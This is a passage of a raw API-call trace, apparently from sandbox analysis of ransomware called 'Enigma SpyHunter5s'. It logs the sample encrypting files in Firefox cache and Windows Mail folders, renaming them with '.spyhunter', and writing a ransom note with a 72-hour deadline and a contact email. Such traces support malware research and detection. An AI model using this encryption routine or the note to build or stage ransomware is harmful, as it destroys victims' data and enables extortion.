(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01.spyhunter")) returned 1 [0155.856] GetProcessHeap () returned 0x2c0000 [0155.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.856] GetProcessHeap () returned 0x2c0000 [0155.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0155.856] GetProcessHeap () returned 0x2c0000 [0155.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbc990 | out: hHeap=0x2c0000) returned 1 [0155.856] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed40 | out: pbBuffer=0x248ed40) returned 1 [0155.856] GetProcessHeap () returned 0x2c0000 [0155.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0155.856] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed38*=0x30) returned 1 [0155.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0155.857] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 97 [0155.857] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".txt") returned 0x0 [0155.857] GetProcessHeap () returned 0x2c0000 [0155.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0155.858] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ecfc*=0xeb, lpOverlapped=0x0) returned 1 [0155.858] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.858] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x248ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ecfc*=0xeb, lpOverlapped=0x0) returned 1 [0155.858] GetProcessHeap () returned 0x2c0000 [0155.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0155.859] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.859] WriteFile (in: hFile=0x178, lpBuffer=0x248ed3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ecfc, lpOverlapped=0x0 | out: lpBuffer=0x248ed3c*, lpNumberOfBytesWritten=0x248ecfc*=0x4, lpOverlapped=0x0) returned 1 [0155.859] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ecfc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ecfc*=0x30, lpOverlapped=0x0) returned 1 [0155.859] CloseHandle (hObject=0x178) returned 1 [0155.859] GetProcessHeap () returned 0x2c0000 [0155.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.859] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.spyhunter") returned 107 [0155.859] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm.spyhunter")) returned 1 [0155.860] GetProcessHeap () returned 0x2c0000 [0155.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.860] GetProcessHeap () returned 0x2c0000 [0155.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0155.860] GetProcessHeap () returned 0x2c0000 [0155.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2b410 | out: hHeap=0x2c0000) returned 1 [0155.860] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed38 | out: pbBuffer=0x248ed38) returned 1 [0155.860] GetProcessHeap () returned 0x2c0000 [0155.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0155.861] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed30*=0x30) returned 1 [0155.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0155.861] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 98 [0155.861] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".txt") returned 0x0 [0155.861] GetProcessHeap () returned 0x2c0000 [0155.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0155.861] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ecf4*=0x1906, lpOverlapped=0x0) returned 1 [0155.910] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe6fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.910] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1906, lpNumberOfBytesWritten=0x248ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ecf4*=0x1906, lpOverlapped=0x0) returned 1 [0155.911] GetProcessHeap () returned 0x2c0000 [0155.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0155.911] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.911] WriteFile (in: hFile=0x178, lpBuffer=0x248ed34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ecf4, lpOverlapped=0x0 | out: lpBuffer=0x248ed34*, lpNumberOfBytesWritten=0x248ecf4*=0x4, lpOverlapped=0x0) returned 1 [0155.911] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ecf4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ecf4*=0x30, lpOverlapped=0x0) returned 1 [0155.911] CloseHandle (hObject=0x178) returned 1 [0155.925] GetProcessHeap () returned 0x2c0000 [0155.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.926] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.spyhunter") returned 108 [0155.926] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.spyhunter")) returned 1 [0155.928] GetProcessHeap () returned 0x2c0000 [0155.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.929] GetProcessHeap () returned 0x2c0000 [0155.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0155.929] GetProcessHeap () returned 0x2c0000 [0155.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2b2f8 | out: hHeap=0x2c0000) returned 1 [0155.929] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed38 | out: pbBuffer=0x248ed38) returned 1 [0155.929] GetProcessHeap () returned 0x2c0000 [0155.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0155.929] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed30*=0x30) returned 1 [0155.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.930] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 91 [0155.930] StrStrW (lpFirst="Bears.htm", lpSrch=".txt") returned 0x0 [0155.930] GetProcessHeap () returned 0x2c0000 [0155.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0155.930] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ecf4*=0xff, lpOverlapped=0x0) returned 1 [0155.931] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.931] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x248ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ecf4*=0xff, lpOverlapped=0x0) returned 1 [0155.931] GetProcessHeap () returned 0x2c0000 [0155.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0155.931] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.932] WriteFile (in: hFile=0xb0, lpBuffer=0x248ed34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ecf4, lpOverlapped=0x0 | out: lpBuffer=0x248ed34*, lpNumberOfBytesWritten=0x248ecf4*=0x4, lpOverlapped=0x0) returned 1 [0155.932] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ecf4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ecf4*=0x30, lpOverlapped=0x0) returned 1 [0155.932] CloseHandle (hObject=0xb0) returned 1 [0155.932] GetProcessHeap () returned 0x2c0000 [0155.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.932] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.spyhunter") returned 101 [0155.932] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm.spyhunter")) returned 1 [0155.933] GetProcessHeap () returned 0x2c0000 [0155.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.933] GetProcessHeap () returned 0x2c0000 [0155.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0155.933] GetProcessHeap () returned 0x2c0000 [0155.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44e28 | out: hHeap=0x2c0000) returned 1 [0155.933] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed30 | out: pbBuffer=0x248ed30) returned 1 [0155.933] GetProcessHeap () returned 0x2c0000 [0155.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0155.933] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed28*=0x30) returned 1 [0155.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0155.934] GetProcessHeap () returned 0x2c0000 [0155.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0155.934] GetProcessHeap () returned 0x2c0000 [0155.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f397f8 | out: hHeap=0x2c0000) returned 1 [0155.934] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed30 | out: pbBuffer=0x248ed30) returned 1 [0155.934] GetProcessHeap () returned 0x2c0000 [0155.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0155.934] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed28*=0x30) returned 1 [0155.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0155.934] GetProcessHeap () returned 0x2c0000 [0155.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0155.934] GetProcessHeap () returned 0x2c0000 [0155.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8dcd8 | out: hHeap=0x2c0000) returned 1 [0155.934] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed28 | out: pbBuffer=0x248ed28) returned 1 [0155.934] GetProcessHeap () returned 0x2c0000 [0155.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0155.934] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed20*=0x30) returned 1 [0155.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 86 [0155.935] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".txt") returned 0x0 [0155.944] GetProcessHeap () returned 0x2c0000 [0155.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0155.944] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ece4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ece4*=0x2800, lpOverlapped=0x0) returned 1 [0155.946] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.946] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ece4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ece4*=0x2800, lpOverlapped=0x0) returned 1 [0155.946] GetProcessHeap () returned 0x2c0000 [0155.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0155.946] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.946] WriteFile (in: hFile=0xb0, lpBuffer=0x248ed24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ece4, lpOverlapped=0x0 | out: lpBuffer=0x248ed24*, lpNumberOfBytesWritten=0x248ece4*=0x4, lpOverlapped=0x0) returned 1 [0155.948] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ece4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ece4*=0x30, lpOverlapped=0x0) returned 1 [0155.948] CloseHandle (hObject=0xb0) returned 1 [0155.948] GetProcessHeap () returned 0x2c0000 [0155.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.948] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.spyhunter") returned 96 [0155.948] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs.spyhunter")) returned 1 [0155.949] GetProcessHeap () returned 0x2c0000 [0155.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.949] GetProcessHeap () returned 0x2c0000 [0155.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0155.949] GetProcessHeap () returned 0x2c0000 [0155.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39608 | out: hHeap=0x2c0000) returned 1 [0155.949] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed28 | out: pbBuffer=0x248ed28) returned 1 [0155.949] GetProcessHeap () returned 0x2c0000 [0155.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0155.949] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed20*=0x30) returned 1 [0155.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.950] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 83 [0155.950] StrStrW (lpFirst="edb00001.log", lpSrch=".txt") returned 0x0 [0155.950] GetProcessHeap () returned 0x2c0000 [0155.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0155.950] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ece4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ece4*=0x2800, lpOverlapped=0x0) returned 1 [0155.962] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.962] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ece4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ece4*=0x2800, lpOverlapped=0x0) returned 1 [0155.962] GetProcessHeap () returned 0x2c0000 [0155.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0155.962] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.962] WriteFile (in: hFile=0xb0, lpBuffer=0x248ed24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ece4, lpOverlapped=0x0 | out: lpBuffer=0x248ed24*, lpNumberOfBytesWritten=0x248ece4*=0x4, lpOverlapped=0x0) returned 1 [0155.963] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ece4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ece4*=0x30, lpOverlapped=0x0) returned 1 [0155.963] CloseHandle (hObject=0xb0) returned 1 [0155.964] GetProcessHeap () returned 0x2c0000 [0155.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.964] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.spyhunter") returned 93 [0155.964] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log.spyhunter")) returned 1 [0155.964] GetProcessHeap () returned 0x2c0000 [0155.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.965] GetProcessHeap () returned 0x2c0000 [0155.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0155.970] GetProcessHeap () returned 0x2c0000 [0155.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8ddc8 | out: hHeap=0x2c0000) returned 1 [0155.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.970] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.970] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec57*, 